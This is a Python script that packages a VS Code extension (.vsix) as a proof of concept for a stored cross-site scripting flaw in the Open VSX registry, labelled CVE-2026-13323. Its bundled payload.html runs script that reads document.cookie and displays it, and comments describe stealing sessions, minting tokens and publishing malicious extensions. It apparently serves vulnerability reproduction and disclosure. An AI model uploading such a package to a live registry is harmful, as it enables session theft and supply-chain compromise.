import zipfile
import os

vsix_path = "testpub.testext-1.0.0.vsix"

content_types = '''<?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="json" ContentType="application/json"/>
  <Default Extension="html" ContentType="text/html"/>
  <Default Extension="vsixmanifest" ContentType="text/xml"/>
</Types>'''

vsixmanifest = '''<?xml version="1.0" encoding="utf-8"?>
<PackageManifest Version="2.0.0" xmlns="http://schemas.microsoft.com/developer/vsx-schema/2011" xmlns:d="http://schemas.microsoft.com/developer/vsx-schema-design/2011">
  <Metadata>
    <Identity Language="en-US" Id="testext" Version="1.0.0" Publisher="testpub"/>
    <DisplayName>Test Extension</DisplayName>
    <Description xml:space="preserve">Test extension for CVE reproduction</Description>
    <Tags>__ext_testext</Tags>
    <Categories>Other</Categories>
    <GalleryFlags>Public</GalleryFlags>
    <Properties>
      <Property Id="Microsoft.VisualStudio.Code.Engine" Value="^1.51.1" />
      <Property Id="Microsoft.VisualStudio.Code.ExtensionDependencies" Value="" />
      <Property Id="Microsoft.VisualStudio.Code.ExtensionPack" Value="" />
      <Property Id="Microsoft.VisualStudio.Code.ExtensionKind" Value="workspace" />
      <Property Id="Microsoft.VisualStudio.Code.LocalizedLanguages" Value="" />
    </Properties>
  </Metadata>
  <Installation>
    <InstallationTarget Id="Microsoft.VisualStudio.Code"/>
  </Installation>
  <Dependencies/>
  <Assets>
    <Asset Type="Microsoft.VisualStudio.Code.Manifest" Path="extension/package.json" Addressable="true" />
  </Assets>
</PackageManifest>'''

package_json = '''{
  "name": "testext",
  "displayName": "Test Extension",
  "description": "Test extension for CVE reproduction",
  "publisher": "testpub",
  "version": "1.0.0",
  "engines": { "vscode": "^1.51.1" },
  "categories": ["Other"],
  "main": "./out/extension.js",
  "contributes": {
    "commands": [{ "command": "testext.hello", "title": "Hello World" }]
  }
}'''

html_payload = '''<!DOCTYPE html>
<html>
<head><title>OpenVSX Inline HTML PoC</title></head>
<body>
<h1>CVE-2026-13323 PoC</h1>
<p>This HTML file is served inline from the open-vsx.org origin.</p>
<script>
// In a real attack, this script runs in the open-vsx.org origin context
// and can access session cookies, generate PATs, and publish malicious extensions.
document.title = "EXFIL: " + document.cookie;
var proof = document.createElement("div");
proof.id = "poc-proof";
proof.innerText = "JS_EXECUTED_IN_REGISTRY_ORIGIN cookies=" + document.cookie;
document.body.appendChild(proof);
</script>
</body>
</html>'''

extension_js = '// Minimal extension entry point\nexports.activate = function() {};\nexports.deactivate = function() {};'

with zipfile.ZipFile(vsix_path, 'w', zipfile.ZIP_DEFLATED) as z:
    z.writestr('[Content_Types].xml', content_types)
    z.writestr('extension.vsixmanifest', vsixmanifest)
    z.writestr('extension/package.json', package_json)
    z.writestr('extension/payload.html', html_payload)
    z.writestr('extension/out/extension.js', extension_js)

print(f"Created {vsix_path} ({os.path.getsize(vsix_path)} bytes)")
